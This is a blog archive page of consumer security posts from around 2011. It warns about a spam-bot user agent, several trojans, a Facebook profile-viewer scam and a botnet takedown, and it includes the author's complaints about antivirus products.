Blog Archives

Bork-Edition User Agent

Opera User Agent “Bork-Edition”

bork-edition spam bot iconHave you seen Bork-edition user agent strings? Wondered what browser uses this string? Maybe noticed nearly all traffic to your site with Bork edition in the user agent string is spam and hacking attempts. User agents with Bork-edition are considered by at least one writer among the top 10 spam bots that must be blocked.

There’s several user agents which on first glance look harmless e.g. user agent string Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

Read the rest of this entry

Advertisements

Microsoft Security Essentials

Microsoft Security Essentials Under Microscope

Microsoft Security Essentials LogoA look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?

Over the next few months we will see.

Annoyed with Commercial AV Software.

I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.

Read the rest of this entry

Soccer Trojan from South Africa

Home Grown Malware?

Satelite Image of South Africa

Image from Wikipedia

It looks like Trojan tvwjfm.exe (with several other names too – list of known names and further information) could have originated from South Africa. At least the first reported  infections came from this locale.

This makes a change to the norm where the largest percentage of new malware hails from the Asian Sub-Continent, although a tie-in to this region cannot be excluded.

This Trojan has not had a big impact; outbreaks so far seem to be limited, possibly deliberately targeting specific users. However, the few reported instances should not be taken to imply this Trojan is not dangerous – it is.

The file is unusually large for a Trojan, containing a package of other files. If run, it behaves like an application installer. Even if the install is cancelled, the Trojan installs other malware unknown to the PC user.

Soccer Trojan

Soccer TrojanI have decided to unofficially name this Trojan (as yet it has no official name) the Soccer Trojan. It presents itself with an icon of a soccer ball superimposed over a PC display, similar to the image on the left, which is clearly an attempt to encourage followers of this ball game to run the file.

Hopefully the Soccer Trojan will remain obscure, and not spread. Our vigilance is required at this early stage to interdict the malware before it gets the opportunity to ‘go viral’ and escape into the wild.

Rove Digital Botnet Take-Down

Cyber-Criminals Arrested, US Offices Closed

A cyber criminal network operated by Estonian company Rove Digital was taken down on November 8 2011 in a combined effort involving the FBI (Federal Bureau of Investigation of the USA) and the Estonian Police in co-operation with Trend Micro.

Rove Digital operated a botnet consisting over four million (4 000 000) bots on computers infected with a class of malware known as ‘DNSChangers’. The infected systems will typically have their Domain Name Server (DNS) changed to point to foreign IP addresses.

Rove digital appears on the surface as a legitimate business, with established offices in Tartu, Estonia. They are the parent company of several other operations, including Esthost, Estdomains, Cernel, UkrTelegroup and many less well-known shell companies.

Rove Digital used a variety of  criminal methods to earn money from the DNS changers. The cyber crime network has operated from 2006.

Operation Ghost Click

Read the rest of this entry

Trojan Horse Generic24

Trojan Generic24 Information

This is a new virus in the wild. Trojan Horse Generic24.cgol is new; so new it has not yet Trojanbeen given a common name. Generic 24.cgol has already been seen in several versions. Trend Micro Threat Library and AVG Library have as yet no information on this version

Generic 24 is extremely dangerous.

At the time of writing this article (20 Sept 2011), and the one for Graphicline, no known anti-virus application is able to detect the initial infection by Generic24.cgol

It is only discovered by heuristic scanning algorithms, after it has infected the user’s PC. Neither AVG was unable able to fully remove the virus; some components needed to be removed manually.

On article on PC1News identifies the virus as an internet re-direct virus, spreading fake AV software with a single click. However I consider this information unreliable, contending there is more to the virus than just this. It definitely downloads other malware, including MsSQL database blockers, and password blockers. I have not seen any other references to this version spreading FakeAV.

The virus, generic24.cgol infected my Firefox browser, installed itself in the program folder, as well as in the Documents/Application settings folders. (and Windows registry)

Sources for this Trojan

The generic24 trojan may infect your PC from an e-mail containing a link to a website from where the trojan will download, or by clicking on a link to a website.

It is possible generic24 may be sent deliberately by malicious persons via e-mail, and may contain an e-mail worm. There is too little definitive information available at present to do anything but advise extreme caution.

Generic24 Removal

For removal information please refer to graphicline.co.za (removing-trojan-generic24cgol).

IMPORTANT – CHANGE ALL ONLINE PASSWORDS

Completely remove trojan

Generic 24 Trojans are typically hacking related.

The trojan, or at least this version poses an active security risk. It may download other malware automatically, including malware files masquerading as Dc#.exe (# = various numbers) as well as a Linux/Unix database blocking virus.

Generic24.cgol may include a keystroke logger, and it definitely tries to actively prevent password changes.

One significant result of the infection was my website graphicline.co.za becoming corrupted. As a normal procedure after any keystroke logger or spyware problem, I change any recently used passwords. When I changed the passwords for my website login, I was still unaware the anti-virus scans had not fully removed the infection, and after logging out of the site, was unable to log back in again. (More on this) Eventually after several failed log-in attempts, the entire CMS website crashed…

NOTE: graphicline.co.za has been completely re-stored (database, CMS, and all active files) from a known clean backup stored remotely, lost content replaced manually, and is safe to visit.

Who Views Facebook Profile Scam is Back

Scam warning who is viewing facebook profilesWho is Viewing Your Facebook Profile Scam back?

This scamming app appears to be making another return to Facebook! Noticing a surge in searches for information on this scam app, I spent some time the past few days doing some research into ‘Who is Viewing Your Facebook Profile’. My first discovery of this app is the subject of a post on this blog.

Who is Viewing Your Facebook Profile has made regular appearances on Facebook over the past few years in several guises. The one common factor is it claims to inform Facebook members about who is viewing your Facebook profile, then after being allowed to connect to your Facebook account, it directs you to a website where you are required to subscribe to a cellphone subscription service, or provide details about yourself; cellphone and e-mail among these.

A more detailed report on my findings can be read on
www.graphicline.co.za/viewing_facebook_profile

Who is Viewing Your Facebook Profile is a SCAM

Online ScamThe scam has at times offered a ‘link’ to a website (Copy and past this link in your browser…)
WARNING: The supposed link is a Javascript and using it to navigate to the website can result in your PC being infected with Phishing Malware

Anyone coming across the Who is Viewing Your Facebook Profile scam app should

  • Block it immediately on their Facebook page(s).
  • Not click on the link whatever you do!
  • Report the app to Facebook

I would also appreciate instances of this app being reported using one of the methods on the mentioned Graphicline webpage.  WordPress, Facebook and Twitter account owners can also use the comment form below. The linking URL will not be made public! I do not want to propagate this scam further.

My intention is to spread the warning about  this scam.

Similar Apps to Who is Viewing Your Facebook ProfileFacebook Security Icon

Any app or website claiming to be able to provide information about viewers of your profile should also be reported. This kind of information is NOT available from Facebook. Any claims that any app or website can provide this information is false; It is a scam, a phishing attempt, and criminal. Any website, app or service that has managed to access this information has done so ILLEGALLY.

Stay vigilant to protect your information and yourself, and prevent the spread of these types of malware.

Bugged!

My computer got bugged

There, I admit it, A malware trojan managed to get into my system.Computer bug image

I’m a tech savvy and vigilant user of computing systems; I provide support to fix bugged systems.

I have firewalls and anti-virus app installed and running, then a trojan first identified around 2006 gets through everything, and goes viral – replicating itself nearly 100 times before the anti-virus scanner decided to do what I paid good cash for, and found the wretched thing.

The bug, identified as a variant of ‘tenga.gen

Tenga.gen opens firewalls and downloads other spyware from the net which will compromise any personal banking and such information. AVG does detect it!, but only after it has downloaded and attempts to run. The current version is masquerading as a Microsoft dotnetfx.exe, and carries a digital signature which identifies it as a Microsoft application. It is not. This virus is a serious risk and will inject code into other executable files if allowed to remain on a windows installation. The most vulnerable are users of Internet Explorer (so what’s new).
It also spreads via LAN!

This copied from a routine alert I send to colleagues and friends when identifying a new Computer bug image2re-appearing bug.

Fortunately no real damage was done. I got lucky. It only replicated itself around 100 times and infected 36 executable files. These were all within a shared folder, only used to keep copies of downloaded app installers, some of which dated back to 2007!

I am also fairly certain it got in on the 28th, maybe 27th of this month, and ran after boot up in the morning of 29th….

The real damage was TIME. 6 hours to run a complete scan during normal productive time, several more hours looking for damaged files and deleting them. then running another scan – 8.5 hrs using House Call, the online app from Trend Micro, and lo, another couple of infected files the AVG scan ‘missed’

I know I’ve had a go at AVG Internet Security before, after a colleague’s system was repeatedly infected over a 6 month period, and required  complete re-format and re-installation of ever no less than 3 times in this time frame. This is also the second time a bug got into my system during the 9 months using the 2011 version of this app. The last time it was detected before it had done any damage, but only by running a manual full system scan, like this time, the internet security part of the thing failed miserably.

I can accept a new and unknown bug getting through heuristic scan algorithms, but a 6 YEAR OLD ONE. I am not impressed!

And evidently this is not the only AV app that does not stop this one getting into the system. Reading reports it appears several other of the major brand AV scanners also fail to detect it.

I am going back to Trend Micro Products. I used PcCillin for 4 years without a single Trend Micro Logoinstance of a bug getting in. I only switched because it is not the easiest app to get in South Africa. Yes, there is a local agent, but no means to purchase online. This is the 21st century,  if the locals can’t provide it online, I will send my money to a company in another country that provides the service.